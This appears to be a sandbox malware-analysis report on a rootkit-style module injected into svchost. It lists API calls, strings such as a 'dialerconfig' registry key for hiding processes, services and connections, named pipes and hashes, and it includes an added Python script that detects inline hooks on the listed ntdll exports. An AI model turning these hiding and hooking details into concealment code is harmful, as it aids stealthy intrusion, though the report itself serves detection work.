                                                                          • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                          • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                          • API String ID: 106492572-2879589442
                                                                          • Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction ID: 3fed60f760ab3f32da691e52dbf4ab303354c7f47779857e17f14048716fb99a
                                                                          • Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
                                                                          • Instruction Fuzzy Hash: A1711C36311F1886EB119FA6E860AD923F6FB85B89F005111DE4EA7F69EF34C485C750

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                          • String ID: d
                                                                          • API String ID: 2005889112-2564639436
                                                                          • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction ID: 495f4bd1ccfcfb5c7fe309b38a271ae55a6fce5f460d804d76d8676db85ca4e3
                                                                          • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                          • Instruction Fuzzy Hash: 30515B36201F8886EB51CFA6E46879A77E2F789F89F044124DA4957B18DF3CC04ACB10

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentThread$AddressHandleModuleProc
                                                                          • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                          • API String ID: 4175298099-1975688563
                                                                          • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction ID: 0a117424bb8ec17e06fa24497d1726645dd05d6d29179111a98c9b800477247c
                                                                          • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                          • Instruction Fuzzy Hash: D1318274142E4EE0FB17EFE9E871AE463E3B714398FC450139449B2E759E78824AD760
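The string list above names the exports the dumped module resolves by hand (GetProcAddress on ntdll.dll, advapi32.dll and sechost.dll) before patching their prologues. The following Python is an added example, not code from the report or from the analysed sample: it shows the check a responder would run on the hooked process, comparing each listed export's first bytes in memory with the clean on-disk copy, naming the patch pattern (jmp rel32, jmp [rip+disp], mov rax,imm64 / jmp rax, push/ret) and resolving where the patched prologue jumps. The ntdll mapping, export addresses and system-call numbers are hypothetical; the hook destination reuses the report's dump base 0x195DD5C0000 for illustration, and the assignment of the service-enumeration names to advapi32.dll and sechost.dll is an assumption, since the report only lists the names and DLLs side by side.

```python
"""Prologue check for the exports the report names as hook targets.

Added example, not code from the report or the analysed sample. Addresses,
module bases and system-call numbers are hypothetical; in a real check the
live bytes come from ReadProcessMemory on the target process and the clean
bytes from the on-disk DLL's export table.
"""
import struct
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Export names taken from the report's string table; the DLL grouping is an
# assumption (the report lists the names and the three DLLs side by side).
HOOK_TARGETS = {
    "ntdll.dll": ["NtDeviceIoControlFile", "NtEnumerateKey", "NtEnumerateValueKey",
                  "NtQueryDirectoryFile", "NtQueryDirectoryFileEx",
                  "NtQuerySystemInformation", "NtResumeThread"],
    "advapi32.dll": ["EnumServiceGroupW", "EnumServicesStatusExW"],
    "sechost.dll": ["EnumServiceGroupW", "EnumServicesStatusExW"],
}

@dataclass
class Finding:
    module: str
    function: str
    kind: str               # classification of the live prologue
    target: Optional[int]   # resolved jump destination, when the prologue is a jump
    outside_module: bool    # destination lies outside the host DLL's image

def classify_prologue(code: bytes) -> str:
    """Name the first instruction(s) of an x64 export prologue."""
    if code[:4] == b"\x4c\x8b\xd1\xb8":                          # mov r10,rcx ; mov eax,ssn
        return "syscall-stub"
    if code[:1] == b"\xe9":                                      # jmp rel32
        return "jmp-rel32"
    if code[:2] == b"\xff\x25":                                  # jmp qword ptr [rip+disp32]
        return "jmp-indirect"
    if code[:2] == b"\x48\xb8" and code[10:12] == b"\xff\xe0":   # mov rax,imm64 ; jmp rax
        return "jmp-abs"
    if code[:1] == b"\x68" and code[5:9] == b"\xc7\x44\x24\x04" and code[13:14] == b"\xc3":
        return "push-ret"                                        # push lo ; mov [rsp+4],hi ; ret
    return "other"

def jump_target(code: bytes, addr: int) -> Optional[int]:
    """Resolve where a patched prologue transfers control, if it can be read statically."""
    kind = classify_prologue(code)
    if kind == "jmp-rel32":
        return (addr + 5 + struct.unpack_from("<i", code, 1)[0]) & 0xFFFFFFFFFFFFFFFF
    if kind == "jmp-abs":
        return struct.unpack_from("<Q", code, 2)[0]
    if kind == "push-ret":
        lo = struct.unpack_from("<I", code, 1)[0]
        hi = struct.unpack_from("<I", code, 9)[0]
        return (hi << 32) | lo
    return None             # jmp-indirect needs a memory read of the pointer slot

def find_hooks(module: str, image: Tuple[int, int],
               live: Dict[str, Tuple[int, bytes]], clean: Dict[str, bytes]):
    """Compare live prologues of the listed exports with the clean image; report mismatches."""
    base, size = image
    findings = []
    for name in HOOK_TARGETS.get(module, []):
        if name not in live:
            continue
        addr, live_bytes = live[name]
        ref = clean.get(name)
        if ref is not None and live_bytes[:len(ref)] == ref:
            continue                                             # untouched prologue
        target = jump_target(live_bytes, addr)
        outside = target is not None and not (base <= target < base + size)
        findings.append(Finding(module, name, classify_prologue(live_bytes), target, outside))
    return findings

# --- constructed sample input (hypothetical addresses and SSNs) ---------------
NTDLL_BASE, NTDLL_SIZE = 0x7FFA12340000, 0x1F0000               # hypothetical ntdll mapping
HOOK_MODULE_BASE = 0x195DD5C0000                                 # dump base quoted in the report

def syscall_stub(ssn: int) -> bytes:
    """Clean x64 Nt* stub: mov r10,rcx; mov eax,ssn; test SharedUserData+0x308,1; jne; syscall; ret."""
    return (b"\x4c\x8b\xd1\xb8" + struct.pack("<I", ssn)
            + b"\xf6\x04\x25\x08\x03\xfe\x7f\x01\x75\x03\x0f\x05\xc3\xcd\x2e\xc3")

def abs_jmp_hook(target: int, original: bytes) -> bytes:
    """Overwrite the first 12 bytes with mov rax,imm64 ; jmp rax, keeping the original tail."""
    patch = b"\x48\xb8" + struct.pack("<Q", target) + b"\xff\xe0"
    return patch + original[len(patch):]

def demo():
    """Check three ntdll exports, one of them redirected into the dumped module."""
    clean = {name: syscall_stub(ssn) for name, ssn in
             [("NtQuerySystemInformation", 0x36), ("NtResumeThread", 0x52), ("NtEnumerateKey", 0x32)]}
    live = {
        "NtQuerySystemInformation": (NTDLL_BASE + 0x2AB0,
                                     abs_jmp_hook(HOOK_MODULE_BASE + 0x3000, clean["NtQuerySystemInformation"])),
        "NtResumeThread": (NTDLL_BASE + 0x2DE0, clean["NtResumeThread"]),
        "NtEnumerateKey": (NTDLL_BASE + 0x2880, clean["NtEnumerateKey"]),
    }
    return find_hooks("ntdll.dll", (NTDLL_BASE, NTDLL_SIZE), live, clean)

if __name__ == "__main__":
    for f in demo():
        dest = f"{f.target:#x}" if f.target is not None else "?"
        print(f"{f.module}!{f.function}: {f.kind} -> {dest}, outside image: {f.outside_module}")
```

Against the constructed input only NtQuerySystemInformation is reported, as a mov rax,imm64 / jmp rax patch whose destination 0x195DD5C3000 lies outside the ntdll image, which is the signature of an inline hook into an injected module. Two caveats for real use: a jmp [rip+disp32] prologue needs a second read of the pointer slot before the destination can be judged, and security products also hook these same Nt* exports, so the destination module, not the mere presence of a patch, decides whether a finding is malicious.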

                                                                          Control-flow Graph

                                                                          Control-flow graph (interactive graph and its executed / not-executed colouring not reproduced): function at 195dd596910 in the module at 195dd590000; CRT DllMain initialisation calling __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c, with a recursive call to 195dd596910.
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                          • API String ID: 190073905-1786718095
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: ceb190c1bc5cb76a39468d0dcf2336ec5ebfdbce9e152840d3fa6cc9d2bd33da
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 6381CE72704E41C6FB52ABE594713D926E3EB96B80F548025EA0577F96EF38C84A8F00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetLastError.KERNEL32 ref: 00000195DD5CCE37
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE4C
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE6D
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCE9A
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEAB
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCEBC
                                                                          • SetLastError.KERNEL32 ref: 00000195DD5CCED7
                                                                          • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF0D
                                                                          • FlsSetValue.KERNEL32(?,?,00000001,00000195DD5CECCC,?,?,?,?,00000195DD5CBF9F,?,?,?,?,?,00000195DD5C7AB0), ref: 00000195DD5CCF2C
                                                                            • Part of subcall function 00000195DD5CD6CC: HeapAlloc.KERNEL32 ref: 00000195DD5CD721
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF54
                                                                            • Part of subcall function 00000195DD5CD744: HeapFree.KERNEL32 ref: 00000195DD5CD75A
                                                                            • Part of subcall function 00000195DD5CD744: GetLastError.KERNEL32 ref: 00000195DD5CD764
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF65
                                                                          • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000195DD5D0A6B,?,?,?,00000195DD5D045C,?,?,?,00000195DD5CC84F), ref: 00000195DD5CCF76
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast$Heap$AllocFree
                                                                          • String ID:
                                                                          • API String ID: 570795689-0
                                                                          • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction ID: 5deeaa700c7bca527ac3e0ef52b0542e40d86773dc9f6c8a69b3fdc468513023
                                                                          • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                          • Instruction Fuzzy Hash: B5412034303E4C82FB6BA7EE59753F913C35B857B4F140724A936E6ED6DE2894818700

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                          • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                          • API String ID: 2171963597-1373409510
                                                                          • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction ID: ef64e02e287f94d0d9415c348699ab4dc805c8a96bd9a803ab77d90ce42376f4
                                                                          • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                          • Instruction Fuzzy Hash: 09217932614B4483FB118BA5F4647AA73E2F789BA5F544215EA5953FA8CF3CC14ACB00

                                                                          Control-flow Graph

                                                                          Control-flow graph (interactive graph and its executed / not-executed colouring not reproduced): function at 195dd599944 in the module at 195dd590000; C++ exception dispatch, per the API IDs below.
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281796722.00000195DD590000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD590000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd590000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction ID: 8578d22811c705561b9a0c63265d0fa22d72dfafe6aec0b6b4f758a2598a20e0
                                                                          • Opcode Fuzzy Hash: 65b39982983e806640910362ba4e105e6dc551b6220b15538d356c191c28ac3a
                                                                          • Instruction Fuzzy Hash: 3EE18C72604B40CAEB62DBA5D4A03DD7BE2F756B98F142116EE8967F99CB34C191CF00

                                                                          Control-flow Graph

                                                                          Control-flow graph (interactive graph and its executed / not-executed colouring not reproduced): function at 195dd5ca544 in the module at 195dd5c0000; the same C++ exception-dispatch routine as the one at 195dd599944 above, per the identical API IDs below.
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                          • String ID: csm$csm$csm
                                                                          • API String ID: 849930591-393685449
                                                                          • Opcode ID: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                          • Instruction ID: 9c2520efcc87ac771d522e1eb6396a81ecb0ce0daac719ccbdf896b70f129e44
                                                                          • Opcode Fuzzy Hash: ff241bfc108c8e41cf32293f5c139143a9d96e7d242899cc36c30a4197855322
                                                                          • Instruction Fuzzy Hash: 07E18D72606B488AEB32DFA9D4913DD7BE2F745B98F100115EE89A7F99CB35C481CB00

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: AddressFreeLibraryProc
                                                                          • String ID: api-ms-$ext-ms-
                                                                          • API String ID: 3013587201-537541572
                                                                          • Opcode ID: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                          • Instruction ID: f94411bdc3c5adc3673d068f26baf74004ea3de06b1d5fa0a00e338998d396b5
                                                                          • Opcode Fuzzy Hash: ec1e5874304155dc1a340afb949db992b9dfa589f06c8a0471ec677ed5d909ab
                                                                          • Instruction Fuzzy Hash: 4741B236313E0492EB17DB9AA8647D623E7BB45BA0F494125DD0AE7F84EE3CC44A8350

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                          • String ID: d
                                                                          • API String ID: 3743429067-2564639436
                                                                          • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction ID: 85125c25dfd785958ae00b37ce84ac9a8513cd9fd1755175fa0b0cf5bc826ac5
                                                                          • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                          • Instruction Fuzzy Hash: CC418C33214F88C6E761CFA5E45479A77E2F389B89F048129DA8957B58DF3CC489CB00
                                                                          APIs
                                                                          • FlsGetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD087
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0A6
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0CE
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0DF
                                                                          • FlsSetValue.KERNEL32(?,?,?,00000195DD5CC7DE,?,?,?,?,?,?,?,?,00000195DD5CCF9D,?,?,00000001), ref: 00000195DD5CD0F0
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value
                                                                          • String ID: 1%$Y%
                                                                          • API String ID: 3702945584-1395475152
                                                                          • Opcode ID: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction ID: b29a2c01b9a529d3d397189201e4ebb9e472c9377beb16884566e216c47c93f0
                                                                          • Opcode Fuzzy Hash: eaed261e9eff258ccad1ac5f7a99306e4284ed666e6615725d2dc279c7a103a4
                                                                          • Instruction Fuzzy Hash: 47112134707A8881FB6A67AF59717E963C35B847F0F1443269839F6EDAEE28C5428700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                          • String ID:
                                                                          • API String ID: 190073905-0
                                                                          • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction ID: db17aeae78a532267f4925ec03955f9628ff8aa19b2b3ce37216714fce8ee9dc
                                                                          • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                          • Instruction Fuzzy Hash: 7281A031602E0F86FB63ABEE98713D967D3AB45780F145415DA05F7F96EB78C8868700
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Library$Load$AddressErrorFreeLastProc
                                                                          • String ID: api-ms-
                                                                          • API String ID: 2559590344-2084034818
                                                                          • Opcode ID: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                          • Instruction ID: 8d15efdb5329dbd6f8d908350e729aaeb4b7b6a33fa5c2f06519c4c6539ee195
                                                                          • Opcode Fuzzy Hash: 9d3cf39bc7784cd844787513709c7d04fd8390ef6f847f410b46324ceba80f6d
                                                                          • Instruction Fuzzy Hash: 0E31E531213E04D1EF13DBCAA4207D523D6B759BA1F590625DD1EABB98EF38C245C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                          • String ID: CONOUT$
                                                                          • API String ID: 3230265001-3130406586
                                                                          • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction ID: 900ef7d4bcd6fd2864e51168dc1007f1dfbbe5e213ae5e9ff28ad5abe65b03b1
                                                                          • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                          • Instruction Fuzzy Hash: 2C11BF32310F4086E7629B96E8643A9B3E1F788FE5F044224EA1A97B94CF78C8058750
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                          • String ID: wr
                                                                          • API String ID: 1092925422-2678910430
                                                                          • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction ID: 42188e63fbb78b0732cb93c59acbf515d5b68af2c84de3977fd9872ca41c66e2
                                                                          • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                          • Instruction Fuzzy Hash: 38118E36302F4982FF559B95F4242A963F2F749B85F040028DE8953B94EF3DC545C714
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Thread$Current$Context
                                                                          • String ID:
                                                                          • API String ID: 1666949209-0
                                                                          • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction ID: 195e277db55ff97f3f99f451c10649e3fcd3ec1e2be31b8428dbef89db2187c3
                                                                          • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                          • Instruction Fuzzy Hash: 12D17876205F8882DB71DB9AE4A439A77E1F388B84F500116EA8E97FA5DF3CC551CB40
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$Process$AllocFree
                                                                          • String ID: dialer
                                                                          • API String ID: 756756679-3528709123
                                                                          • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction ID: fc4c9099da629ec678108cb9cb41e40dfa530a30d66993f12becd6c4ba3f9dba
                                                                          • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                          • Instruction Fuzzy Hash: 0C317036702F5DC2E716DF9AE561BA977E2FB44B84F084020DE48A7F55EB34C4A18740
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: Value$ErrorLast
                                                                          • String ID:
                                                                          • API String ID: 2506987500-0
                                                                          • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction ID: 8fdc15ff09e63732eb275527d3260f2eb5a265f6af426b64fb26ff3aadc1099c
                                                                          • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                          • Instruction Fuzzy Hash: C9115E34203E4882FB66A7AE59757B963C39B847B4F144725A836F6FD6EE6884428700
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                          • String ID:
                                                                          • API String ID: 517849248-0
                                                                          • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction ID: 094941dede99f9d048632fe007c60956db5d273133d38dce1c9db68577c35704
                                                                          • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                          • Instruction Fuzzy Hash: F4018C31300E4882EB11DB92A86879963E2F788FC1F884035DE4DA3B54DF3CC98AC750
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                          • String ID:
                                                                          • API String ID: 449555515-0
                                                                          • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction ID: a4c37ed03e2153ec921c4fe35d3b930d694565bbf9533148a8bdd7b871a42841
                                                                          • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                          • Instruction Fuzzy Hash: 00014075312F4882FF269BA6E82879573E2BB45B86F040424CE4967B54EF3DC149C710
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000028.00000002.3281930657.00000195DD5C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000195DD5C0000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_40_2_195dd5c0000_svchost.jbxd
                                                                          Similarity
                                                                          • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                          • String ID: csm$f
                                                                          • API String ID: 2395640692-629598281
                                                                          • Opcode ID: 23eacf76fefb4f7f9308e1222479b694a5ecefb866da3529da442ff7070fa44f
